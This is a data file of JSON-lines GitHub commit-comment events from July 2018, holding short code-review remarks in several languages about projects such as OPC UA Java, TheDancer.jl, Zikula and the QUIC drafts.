{"id":"7927799109","type":"CommitCommentEvent","actor":{"login":"bjakke"},"repo":{"name":"OPCFoundation/UA-Java"},"payload":{"comment":{"id":29618687,"position":null,"line":null,"path":null,"commit_id":"0c1c7a402a4f57eabdc014e2a6b286b51aa5673e","created_at":"2018-07-06T09:18:45Z","updated_at":"2018-07-06T09:18:45Z","author_association":"CONTRIBUTOR","body":"If I may ask, does this cause an actual problem for you in some case, or more like \"this would seem to be not exactly correct, should be fixed\" category? Anyway, please make an issue and put the text there.\r\n\r\nI only looked at the final diff and that was ok. I guess I could have been more strict that all revert etc. commits should have been cleaned and just have one commit for the merge with the final changes. Generally this project does not receive many pull requests so the practice is not that well established.\r\n\r\nGiven that XmlDecoder calls the (Expanded)NodeId.parse method it probably should handle the decoding. However with 1.04 there will be a new encoding (JSON). So preferably with 1.04 the parse methods maybe should be removed and the current impl put to XmlDecoder directly as all encoding formats are different. But I need to look into that after the #136 etc is done. "}},"created_at":"2018-07-06T09:18:45Z"}
{"id":"7927799661","type":"CommitCommentEvent","actor":{"login":"xiaobai2004"},"repo":{"name":"xiaobai2004/xiaobai-frontend"},"payload":{"comment":{"id":29618688,"position":null,"line":null,"path":null,"commit_id":"5d69301d8b2374e46cb6822042c12e1de081a2f2","created_at":"2018-07-06T09:18:52Z","updated_at":"2018-07-06T09:18:52Z","author_association":"OWNER","body":"add page user"}},"created_at":"2018-07-06T09:18:52Z"}
{"id":"7927800078","type":"CommitCommentEvent","actor":{"login":"catRat"},"repo":{"name":"catRat/Change-R-code-to-Python-code"},"payload":{"comment":{"id":29618689,"position":null,"line":null,"path":null,"commit_id":"7630f6b4d37be67c36c716953a9d3fc9a9082a84","created_at":"2018-07-06T09:18:58Z","updated_at":"2018-07-06T09:18:58Z","author_association":"OWNER","body":"source file"}},"created_at":"2018-07-06T09:18:58Z"}
{"id":"7927805926","type":"CommitCommentEvent","actor":{"login":"RoseTeague"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29618706,"position":null,"line":null,"path":null,"commit_id":"6e755461ef78f9bf3854ded35f4a55cb3d0f9b35","created_at":"2018-07-06T09:20:08Z","updated_at":"2018-07-06T09:20:08Z","author_association":"COLLABORATOR","body":"Yes, I'd been meaning to put them into doc strings but wasn't sure on the format - thanks for the link I will make see changes now :)\r\n\r\nWith regards to the global vs const, it's on my to-do list for checking speed, I've come across a couple of stack exchange responses but haven't read through them properly yet! - https://stackoverflow.com/questions/48781443/defining-constant-global-variables-in-julia https://github.com/JuliaLang/julia/issues/8870  etc... will look through these today as well. "}},"created_at":"2018-07-06T09:20:08Z"}
{"id":"7927806285","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"MrFenril/mapotempo-web"},"payload":{"comment":{"id":29618709,"position":null,"line":null,"path":null,"commit_id":"6aa330575d37d2dc1e436cdbc28f6eb48825ba64","created_at":"2018-07-06T09:20:12Z","updated_at":"2018-07-06T09:20:12Z","author_association":"NONE","body":"Ok correct. In additon, don't show button in creation and \"enable_multi_visits\" option is not active"}},"created_at":"2018-07-06T09:20:12Z"}
{"id":"7927809176","type":"CommitCommentEvent","actor":{"login":"diegantobass"},"repo":{"name":"regardscitoyens/Collaborateurs-Parlement"},"payload":{"comment":{"id":29618714,"position":null,"line":null,"path":null,"commit_id":"960152f012eb75cc1f4e410e829bbfd9962f0a8e","created_at":"2018-07-06T09:20:45Z","updated_at":"2018-07-06T09:20:45Z","author_association":"COLLABORATOR","body":"Est-ce qu'on parle de comment c'est compliqué de lire un diff de notebook ?"}},"created_at":"2018-07-06T09:20:45Z"}
{"id":"7927819529","type":"CommitCommentEvent","actor":{"login":"lukechilds"},"repo":{"name":"kornelski/http-cache-semantics"},"payload":{"comment":{"id":29618740,"position":null,"line":null,"path":null,"commit_id":"d0bf1baf301dc6044a839ac309685e9385fb6c3b","created_at":"2018-07-06T09:22:48Z","updated_at":"2018-07-06T09:22:48Z","author_association":"CONTRIBUTOR","body":"😆"}},"created_at":"2018-07-06T09:22:48Z"}
{"id":"7927820113","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"MrFenril/mapotempo-web"},"payload":{"comment":{"id":29618742,"position":7,"line":97,"path":"app/helpers/vehicle_usages_helper.rb","commit_id":"95d2a884f3a7067200843a6afa789bf74449cb82","created_at":"2018-07-06T09:22:55Z","updated_at":"2018-07-06T09:22:55Z","author_association":"NONE","body":"don't keep comment"}},"created_at":"2018-07-06T09:22:55Z"}
{"id":"7927820863","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"yuehy/tcexam"},"payload":{"comment":{"id":29618747,"position":9,"line":48,"path":"admin/code/tce_page_info.php","commit_id":"fafd1366e1b6fabf6111aa3b7d8fd00b01a446a9","created_at":"2018-07-06T09:23:05Z","updated_at":"2018-07-06T09:23:05Z","author_association":"NONE","body":"It is illegal to change this. The author of the software is Nicola Asuni."}},"created_at":"2018-07-06T09:23:05Z"}
{"id":"7927821598","type":"CommitCommentEvent","actor":{"login":"Arturik456"},"repo":{"name":"Arturik456/graduation_work"},"payload":{"comment":{"id":29618751,"position":null,"line":null,"path":null,"commit_id":"6530a01d93d2b60b58c9694b6065a043a0a73647","created_at":"2018-07-06T09:23:14Z","updated_at":"2018-07-06T09:23:14Z","author_association":"OWNER","body":"]"}},"created_at":"2018-07-06T09:23:14Z"}
{"id":"7927847168","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"MrFenril/mapotempo-web"},"payload":{"comment":{"id":29618812,"position":null,"line":null,"path":null,"commit_id":"7920f6ceedfa5e5f38888832b49f3ad4037775e6","created_at":"2018-07-06T09:28:26Z","updated_at":"2018-07-06T09:28:26Z","author_association":"NONE","body":"add unit test"}},"created_at":"2018-07-06T09:28:26Z"}
{"id":"7927847372","type":"CommitCommentEvent","actor":{"login":"ce07c3"},"repo":{"name":"electricimp/Rocky"},"payload":{"comment":{"id":29618813,"position":87,"line":87,"path":"tests/Base.nut","commit_id":"cdac3a23f326076106b6d295d96e5b1487367f4e","created_at":"2018-07-06T09:28:29Z","updated_at":"2018-07-06T09:28:29Z","author_association":"NONE","body":"space after `=` missing"}},"created_at":"2018-07-06T09:28:29Z"}
{"id":"7927856431","type":"CommitCommentEvent","actor":{"login":"RoseTeague"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29618841,"position":null,"line":null,"path":null,"commit_id":"854fd8720b3c5a4dc8e6744a8a2239f3d4230595","created_at":"2018-07-06T09:30:18Z","updated_at":"2018-07-06T09:30:18Z","author_association":"COLLABORATOR","body":"The 9*r^-7 isn't really going to be included - sorry I've not commented this bit very well but this was basically to see the differences of including dipole-dipole responses vs not. Because all the dipoles are induced dipoles rather than permanent ones, the potential energy of their interactions scales as 1/r^6 and hence the Field as 1/r^7. "}},"created_at":"2018-07-06T09:30:18Z"}
{"id":"7927858253","type":"CommitCommentEvent","actor":{"login":"dennisweissmann"},"repo":{"name":"dennisweissmann/DeviceKit"},"payload":{"comment":{"id":29618844,"position":null,"line":null,"path":null,"commit_id":"26c8721dadb2c50b24ad859d6728f32f12ec2f53","created_at":"2018-07-06T09:30:39Z","updated_at":"2018-07-06T09:30:39Z","author_association":"OWNER","body":"CocoaPods should always refer to versions, and those versions are tags referring to specific commits, so there should not be any problem! What problems are you having specifically? 😱"}},"created_at":"2018-07-06T09:30:39Z"}
{"id":"7927862136","type":"CommitCommentEvent","actor":{"login":"cyclowns"},"repo":{"name":"cyclowns/tf2-rich-presence"},"payload":{"comment":{"id":29618849,"position":null,"line":null,"path":null,"commit_id":"bc24a50303a777d24a80c8ec74fa756de8ec80fb","created_at":"2018-07-06T09:31:25Z","updated_at":"2018-07-06T09:31:25Z","author_association":"OWNER","body":"THERE GOES ALL MY WORK ON CI FOR 2 HOURS DOWN THE DRAIN FUCK YOU"}},"created_at":"2018-07-06T09:31:25Z"}
{"id":"7927863645","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29618850,"position":16,"line":19,"path":"src/views/animation.html","commit_id":"0a187743eba02e0661ea024cee2fa9cb38eab485","created_at":"2018-07-06T09:31:42Z","updated_at":"2018-07-06T09:31:42Z","author_association":"CONTRIBUTOR","body":"嘗試用 [forEach](https://developer.mozilla.org/zh-TW/docs/Web/JavaScript/Reference/Global_Objects/Array/forEach) 取代 for 迴圈修改看看\r\n\r\nfor 迴圈相比 forEach 來說，是比較底層的 method，但是需要多考慮一個變數 i，使用 forEach 來改會更易讀"}},"created_at":"2018-07-06T09:31:42Z"}
{"id":"7927872657","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29618870,"position":null,"line":null,"path":null,"commit_id":"6e755461ef78f9bf3854ded35f4a55cb3d0f9b35","created_at":"2018-07-06T09:33:27Z","updated_at":"2018-07-06T09:33:27Z","author_association":"OWNER","body":"`const global` looks like the way to go.\r\nThe `@code_warntype` should start complaining about `Any` if you run it on some of these functions."}},"created_at":"2018-07-06T09:33:27Z"}
{"id":"7927872995","type":"CommitCommentEvent","actor":{"login":"plogana"},"repo":{"name":"opencomputeproject/SAI"},"payload":{"comment":{"id":29618871,"position":null,"line":null,"path":null,"commit_id":"408a2d9708892921207373973fc82c54903fc5fc","created_at":"2018-07-06T09:33:32Z","updated_at":"2018-07-06T09:33:32Z","author_association":"NONE","body":"Hi,\r\nis there any supporting document available that explains the intent of this attribute i.e. 'SAI_QUEUE_ATTR_PFC_DLR_INIT'"}},"created_at":"2018-07-06T09:33:32Z"}
{"id":"7927882763","type":"CommitCommentEvent","actor":{"login":"mymymyooh"},"repo":{"name":"mymymyooh/Dovlatov"},"payload":{"comment":{"id":29618892,"position":null,"line":null,"path":null,"commit_id":"9a991140c9dbf7ce2d55a4ed437a7b14589c5e11","created_at":"2018-07-06T09:35:29Z","updated_at":"2018-07-06T09:35:29Z","author_association":"OWNER","body":"Heyhey :)"}},"created_at":"2018-07-06T09:35:29Z"}
{"id":"7927883457","type":"CommitCommentEvent","actor":{"login":"gthomas2"},"repo":{"name":"moodlerooms/moodle-tool_ally"},"payload":{"comment":{"id":29618895,"position":12,"line":134,"path":"classes/local_content.php","commit_id":"055567ab0c74dd156ee26f5bd328b466b435292c","created_at":"2018-07-06T09:35:38Z","updated_at":"2018-07-06T09:35:38Z","author_association":"CONTRIBUTOR","body":"I feel like 'events' are not the right tool for logging errors. Traditionally events were for course, module and user level events although they do now contain web service function calls too. If we look at this from a 'what does core do' perspective we can see that a) They don't seem to log errors - they just throw them, b) None of the core events are for errors - they are all for course,module,user and webservice type events. If you take a look at the Collaborate Moodle module you can see a PSR logger being utilised for error / info logging. Personally I think this is better because the logs are tailored specifically for info / error logging - that means you can easily query for errors categorised by specific error levels (info, warning, critical, severe). BTW - I'm not suggesting that we should rip out all the error events that have been implemented in Ally but it's worth questioning whether they should be used in this way and whether they should be replaced at some point in the future."}},"created_at":"2018-07-06T09:35:38Z"}
{"id":"7927891289","type":"CommitCommentEvent","actor":{"login":"gabrieleg"},"repo":{"name":"nimble-platform/collaboration-tools"},"payload":{"comment":{"id":29618910,"position":null,"line":null,"path":null,"commit_id":"65f4462a029ee4b1960a85285844aefff9787bc0","created_at":"2018-07-06T09:37:14Z","updated_at":"2018-07-06T09:37:14Z","author_association":"COLLABORATOR","body":"Invites Update"}},"created_at":"2018-07-06T09:37:14Z"}
{"id":"7927891669","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618913,"position":30,"line":30,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:37:18Z","updated_at":"2018-07-06T09:37:18Z","author_association":"NONE","body":"Повтор кода - вынеси в метод"}},"created_at":"2018-07-06T09:37:18Z"}
{"id":"7927893441","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618918,"position":35,"line":35,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:37:38Z","updated_at":"2018-07-06T09:37:38Z","author_association":"NONE","body":"Опять повтор кода"}},"created_at":"2018-07-06T09:37:38Z"}
{"id":"7927893583","type":"CommitCommentEvent","actor":{"login":"mmdnetwork"},"repo":{"name":"mmdnetwork/mmdnetwork.com"},"payload":{"comment":{"id":29618919,"position":null,"line":null,"path":null,"commit_id":"1cd219245e6673451c89fcb43ab3256aa683c706","created_at":"2018-07-06T09:37:40Z","updated_at":"2018-07-06T09:37:40Z","author_association":"OWNER","body":"Added Blog2Social Plugin, and connected all social media accounts to the site.  Pretty much every social media you can think of all match with the same logo across the board.  Everything looks pretty uniform."}},"created_at":"2018-07-06T09:37:40Z"}
{"id":"7927894444","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618920,"position":2,"line":2,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:37:51Z","updated_at":"2018-07-06T09:37:51Z","author_association":"NONE","body":"Check"}},"created_at":"2018-07-06T09:37:51Z"}
{"id":"7927896204","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618924,"position":5,"line":5,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:38:12Z","updated_at":"2018-07-06T09:38:12Z","author_association":"NONE","body":"Почему ты создаешь новое поле каждый раз?"}},"created_at":"2018-07-06T09:38:12Z"}
{"id":"7927897584","type":"CommitCommentEvent","actor":{"login":"DimaP91"},"repo":{"name":"Social-projects-Rivne/TripAssistantCore"},"payload":{"comment":{"id":29618929,"position":22,"line":16,"path":"client/pages/Profile/Profile.jsx","commit_id":"e4b5b262e0296a4e2efd47ceaa6991138701ee00","created_at":"2018-07-06T09:38:29Z","updated_at":"2018-07-06T09:38:29Z","author_association":"NONE","body":"Стягни з цієї апішки .json і додай до нас в паблік, щоб тягнути звідти а не зовнішнього ресурсу."}},"created_at":"2018-07-06T09:38:29Z"}
{"id":"7927897606","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618930,"position":10,"line":10,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:38:30Z","updated_at":"2018-07-06T09:38:30Z","author_association":"NONE","body":"Отдельный метод"}},"created_at":"2018-07-06T09:38:30Z"}
{"id":"7927898120","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618935,"position":19,"line":19,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:38:36Z","updated_at":"2018-07-06T09:38:36Z","author_association":"NONE","body":"Отдельный метод"}},"created_at":"2018-07-06T09:38:36Z"}
{"id":"7927901012","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618940,"position":42,"line":42,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:39:11Z","updated_at":"2018-07-06T09:39:11Z","author_association":"NONE","body":"setCheck(true)"}},"created_at":"2018-07-06T09:39:11Z"}
{"id":"7927901289","type":"CommitCommentEvent","actor":{"login":"zah"},"repo":{"name":"status-im/nim-asyncdispatch2"},"payload":{"comment":{"id":29618941,"position":null,"line":null,"path":null,"commit_id":"4911d25807d8943e7dbecb7c5f442ef597a8dd3b","created_at":"2018-07-06T09:39:14Z","updated_at":"2018-07-06T09:39:14Z","author_association":"MEMBER","body":"`getName` is used to obtain the name of the proc to which the async pragma is applied. If this proc is generated by a macro, the macro may have decided to put a symbol in there. It's a trivial fix to cover that case."}},"created_at":"2018-07-06T09:39:14Z"}
{"id":"7927902396","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29618947,"position":30,"line":30,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T09:39:27Z","updated_at":"2018-07-06T09:39:27Z","author_association":"NONE","body":"обнулить z?"}},"created_at":"2018-07-06T09:39:27Z"}
{"id":"7927903232","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29618950,"position":null,"line":null,"path":null,"commit_id":"854fd8720b3c5a4dc8e6744a8a2239f3d4230595","created_at":"2018-07-06T09:39:36Z","updated_at":"2018-07-06T09:39:36Z","author_association":"OWNER","body":"It's worth spending some time cleaning up the code + documenting now while it is still in your memory. \r\nOne thing that's also a little inconsistent is the naming (I'm sure inherited from me) - we should decide whether to CamelCase or underline_things, and then unify everything. "}},"created_at":"2018-07-06T09:39:36Z"}
{"id":"7927910577","type":"CommitCommentEvent","actor":{"login":"DimaP91"},"repo":{"name":"Social-projects-Rivne/TripAssistantCore"},"payload":{"comment":{"id":29618969,"position":43,"line":37,"path":"client/pages/Profile/Profile.jsx","commit_id":"e4b5b262e0296a4e2efd47ceaa6991138701ee00","created_at":"2018-07-06T09:41:07Z","updated_at":"2018-07-06T09:41:07Z","author_association":"NONE","body":"З картинками так само, зберегти в паблік/імадж, щоб не залежити від інших ресурсів."}},"created_at":"2018-07-06T09:41:07Z"}
{"id":"7927911462","type":"CommitCommentEvent","actor":{"login":"enrevol"},"repo":{"name":"Senspark/ee-x"},"payload":{"comment":{"id":29618973,"position":5,"line":15,"path":"proj.android_studio/ee-x-crashlytics/build.gradle","commit_id":"502af3df27746b67bb72cdcc572a877927893176","created_at":"2018-07-06T09:41:17Z","updated_at":"2018-07-06T09:41:17Z","author_association":"CONTRIBUTOR","body":"2.9.4 mới nhất"}},"created_at":"2018-07-06T09:41:17Z"}
{"id":"7927912628","type":"CommitCommentEvent","actor":{"login":"AJvanLoon"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29618977,"position":26,"line":54,"path":"website/src/docs/webcam.md","commit_id":"c2341f93a537b2671c2948b9804a523d7b258d45","created_at":"2018-07-06T09:41:32Z","updated_at":"2018-07-06T09:41:32Z","author_association":"CONTRIBUTOR","body":"Yeah, noticed that at some point. I thought I had reverted all of them already. Thanks!"}},"created_at":"2018-07-06T09:41:32Z"}
{"id":"7927913991","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29618981,"position":null,"line":null,"path":null,"commit_id":"854fd8720b3c5a4dc8e6744a8a2239f3d4230595","created_at":"2018-07-06T09:41:48Z","updated_at":"2018-07-06T09:41:48Z","author_association":"OWNER","body":"Oh! And move code tests into test; and start actually writing some unit tests. That way you can apply cleansing + optimisation safe in the knowledge that it's correct (or at least consistent with what went before...). \r\nFor instance, I think `alphainv = -ones(N)` would work + be more direct."}},"created_at":"2018-07-06T09:41:48Z"}
{"id":"7927914306","type":"CommitCommentEvent","actor":{"login":"julmot"},"repo":{"name":"ClimberAB/ClimberKPI"},"payload":{"comment":{"id":29618982,"position":9,"line":82,"path":"CHANGELOG.yml","commit_id":"64a81d8c5409ec5298dce1e323f69ac061245e34","created_at":"2018-07-06T09:41:52Z","updated_at":"2018-07-06T09:41:52Z","author_association":"NONE","body":"@ClimberAB What did change exactly from a user point of view beside of the project structure refactoring?"}},"created_at":"2018-07-06T09:41:52Z"}
{"id":"7927915080","type":"CommitCommentEvent","actor":{"login":"wangshaopeng2018"},"repo":{"name":"wangshaopeng2018/token-profile"},"payload":{"comment":{"id":29618988,"position":null,"line":null,"path":null,"commit_id":"01b1775140d2b4c2ca120af3467849ec202f4db7","created_at":"2018-07-06T09:42:01Z","updated_at":"2018-07-06T09:42:01Z","author_association":"OWNER","body":"您好，我们代币的信息提交成功了吗？还需要做些什么呢？我看logo并没有显示"}},"created_at":"2018-07-06T09:42:01Z"}
{"id":"7927918251","type":"CommitCommentEvent","actor":{"login":"josecollazzi"},"repo":{"name":"manywho/service-azure"},"payload":{"comment":{"id":29618994,"position":18,"line":50,"path":"src/main/java/com/manywho/services/azure/services/AuthenticationService.java","commit_id":"868e2690a9b0e76dbb40d8ca5788e96c617f01ec","created_at":"2018-07-06T09:42:37Z","updated_at":"2018-07-06T09:42:37Z","author_association":"CONTRIBUTOR","body":"@jonjomckay Ok if the email is a requirement in the platform I will throw an exception. I hope no body have the great idea of create accounts without emails. This bug was already reported by a customer but in a testing environment."}},"created_at":"2018-07-06T09:42:37Z"}
{"id":"7927930508","type":"CommitCommentEvent","actor":{"login":"ngeiswei"},"repo":{"name":"opencog/as-moses"},"payload":{"comment":{"id":29619012,"position":81,"line":81,"path":"tests/atomese/representation/atomese_reprUTest.cxxtest","commit_id":"56612fd22268bf985474bb09f32c63a3b216c055","created_at":"2018-07-06T09:45:02Z","updated_at":"2018-07-06T09:45:02Z","author_association":"MEMBER","body":"@Yidnekachew I think in this context\r\n```\r\nHandle expected = eval->eval_h(\"real_data_repr_compact\");\r\n```\r\nwould work since `real_data_repr_compact` doesn't require an Atomese evaluation/execution, it's already in the form we want it to be."}},"created_at":"2018-07-06T09:45:02Z"}
{"id":"7927933875","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29619024,"position":36,"line":48,"path":"src/system/ThemeModule/Engine/AssetBag.php","commit_id":"c97c60a5383fb74024f8ed06e8030b5332c6dfd2","created_at":"2018-07-06T09:45:38Z","updated_at":"2018-07-06T09:45:38Z","author_association":"MEMBER","body":"changing all these weight values is a potential BC break. If someone has created their own asset and loaded it in order based on existing values, now their asset loads in a different place."}},"created_at":"2018-07-06T09:45:38Z"}
{"id":"7927937982","type":"CommitCommentEvent","actor":{"login":"mantree"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29619033,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-06T09:46:27Z","updated_at":"2018-07-06T09:46:27Z","author_association":"CONTRIBUTOR","body":"I think a trigger.yaml file is out there in the future.\r\n\r\nGood point Shaun. I don't think we have a good story around configuration yet. Perhaps there something in the App abstraction that can help here. There's a conversation to be had around System development and features needed to support that."}},"created_at":"2018-07-06T09:46:27Z"}
{"id":"7927939743","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29619044,"position":4,"line":131,"path":"src/system/ThemeModule/EventListener/DefaultPageAssetSetterListener.php","commit_id":"c97c60a5383fb74024f8ed06e8030b5332c6dfd2","created_at":"2018-07-06T09:46:47Z","updated_at":"2018-07-06T09:46:47Z","author_association":"MEMBER","body":"so now jQueryUI loads on ALL pages? Is this really required? I had hoped to avoid this because it was quite heavy IIRC. It is not necessary in many cases."}},"created_at":"2018-07-06T09:46:47Z"}
{"id":"7927943622","type":"CommitCommentEvent","actor":{"login":"livemusicbangla"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":29619049,"position":null,"line":null,"path":null,"commit_id":"3d0b33b32fa10576012268c84e13bc0e3b7fc5a4","created_at":"2018-07-06T09:47:32Z","updated_at":"2018-07-06T09:47:32Z","author_association":"NONE","body":"Web server"}},"created_at":"2018-07-06T09:47:32Z"}
{"id":"7927944443","type":"CommitCommentEvent","actor":{"login":"RoseTeague"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29619050,"position":null,"line":null,"path":null,"commit_id":"854fd8720b3c5a4dc8e6744a8a2239f3d4230595","created_at":"2018-07-06T09:47:42Z","updated_at":"2018-07-06T09:47:42Z","author_association":"COLLABORATOR","body":"Okay great, I'll try and finish commenting etc today. I think most of the naming is in CamelCase so I will change everything else to be consistent with that. \r\n\r\nI'm not 100% sure what you mean with the code tests (this is the first proper collaborative project I've done so you might have to bear with me a bit - sorry!) but we can talk about it next week perhaps? "}},"created_at":"2018-07-06T09:47:42Z"}
{"id":"7927945309","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29619053,"position":4,"line":131,"path":"src/system/ThemeModule/EventListener/DefaultPageAssetSetterListener.php","commit_id":"c97c60a5383fb74024f8ed06e8030b5332c6dfd2","created_at":"2018-07-06T09:47:52Z","updated_at":"2018-07-06T09:47:52Z","author_association":"MEMBER","body":"do you see a better way to enfore it's loading before bootstrap?\r\nif bootstrap is loaded before a conflict occurs."}},"created_at":"2018-07-06T09:47:52Z"}
{"id":"7927946838","type":"CommitCommentEvent","actor":{"login":"mikkelfj"},"repo":{"name":"quicwg/base-drafts"},"payload":{"comment":{"id":29619055,"position":54,"line":585,"path":"draft-ietf-quic-transport.md","commit_id":"3aea50db51a14f2b42ed8aea7dbeeea72c6321b4","created_at":"2018-07-06T09:48:10Z","updated_at":"2018-07-06T09:48:10Z","author_association":"NONE","body":"T case"}},"created_at":"2018-07-06T09:48:10Z"}
{"id":"7927947101","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29619056,"position":4,"line":131,"path":"src/system/ThemeModule/EventListener/DefaultPageAssetSetterListener.php","commit_id":"c97c60a5383fb74024f8ed06e8030b5332c6dfd2","created_at":"2018-07-06T09:48:13Z","updated_at":"2018-07-06T09:48:13Z","author_association":"MEMBER","body":"at the end a browser caches it anyway, so it is only loaded once"}},"created_at":"2018-07-06T09:48:13Z"}
{"id":"7927950987","type":"CommitCommentEvent","actor":{"login":"pannarale"},"repo":{"name":"gwastro/pycbc"},"payload":{"comment":{"id":29619067,"position":null,"line":null,"path":null,"commit_id":"55757947649c1d92d4becd3d51a4e7c3934f0442","created_at":"2018-07-06T09:48:58Z","updated_at":"2018-07-06T09:48:58Z","author_association":"CONTRIBUTOR","body":"Hi @idorrington92, I think you want line 1 to read\r\n\r\n`#! /usr/bin/env python`"}},"created_at":"2018-07-06T09:48:58Z"}
{"id":"7927952964","type":"CommitCommentEvent","actor":{"login":"RaufR"},"repo":{"name":"RaufR/dms_solution_v1.0_beta"},"payload":{"comment":{"id":29619070,"position":null,"line":null,"path":null,"commit_id":"ca8423443835f069044693e697ac98bae533680a","created_at":"2018-07-06T09:49:22Z","updated_at":"2018-07-06T09:49:22Z","author_association":"OWNER","body":"working"}},"created_at":"2018-07-06T09:49:22Z"}
{"id":"7927956392","type":"CommitCommentEvent","actor":{"login":"jodastephen"},"repo":{"name":"checkstyle/contribution"},"payload":{"comment":{"id":29619075,"position":null,"line":null,"path":null,"commit_id":"2829508bd40acabeb67165a595d312827d3f1dd4","created_at":"2018-07-06T09:50:07Z","updated_at":"2018-07-06T09:50:07Z","author_association":"NONE","body":"Thanks, I was just about to do that!"}},"created_at":"2018-07-06T09:50:07Z"}
{"id":"7927957122","type":"CommitCommentEvent","actor":{"login":"mantree"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29619076,"position":11,"line":8,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-06T09:50:15Z","updated_at":"2018-07-06T09:50:15Z","author_association":"CONTRIBUTOR","body":"The same could be said of 'version', what is it the version of exactly, it's very confusing.\r\n\r\nI could sort of this out, add some nesting to give context, but it'll be a more impactful change that way.\r\n\r\nIt seems like people really like the func.yaml, let's go back to it."}},"created_at":"2018-07-06T09:50:15Z"}
{"id":"7927962840","type":"CommitCommentEvent","actor":{"login":"idegtiarov"},"repo":{"name":"raccoongang/edx-platform"},"payload":{"comment":{"id":29619088,"position":52,"line":30,"path":"lms/djangoapps/branding/forms.py","commit_id":"4efefa3511a803881781a2f02d0727aed277ee92","created_at":"2018-07-06T09:51:25Z","updated_at":"2018-07-06T09:51:25Z","author_association":"NONE","body":"Why do you use tuple over `dict.items()` object?"}},"created_at":"2018-07-06T09:51:25Z"}
{"id":"7927964313","type":"CommitCommentEvent","actor":{"login":"mikkelfj"},"repo":{"name":"quicwg/base-drafts"},"payload":{"comment":{"id":29619090,"position":160,"line":751,"path":"draft-ietf-quic-transport.md","commit_id":"3aea50db51a14f2b42ed8aea7dbeeea72c6321b4","created_at":"2018-07-06T09:51:43Z","updated_at":"2018-07-06T09:51:43Z","author_association":"NONE","body":"UDP datagrams, to be consistent with wording later on, and to be more clear about the difference from packet."}},"created_at":"2018-07-06T09:51:43Z"}
{"id":"7927969335","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29619092,"position":null,"line":null,"path":null,"commit_id":"2744de6c0927799ab1bda5c0414f2ce60a5ded54","created_at":"2018-07-06T09:52:46Z","updated_at":"2018-07-06T09:52:46Z","author_association":"NONE","body":"@vondele Congrats!\r\nBack in 2015 when introducing the halfdensity-map  I added also this therm + rootPos.game_ply()\r\nbecause of a theoretical consideration and because I knew that it could help maybe, but cannot hurt (elo-wise). Now you have shown that indeed it is useless :-)"}},"created_at":"2018-07-06T09:52:46Z"}
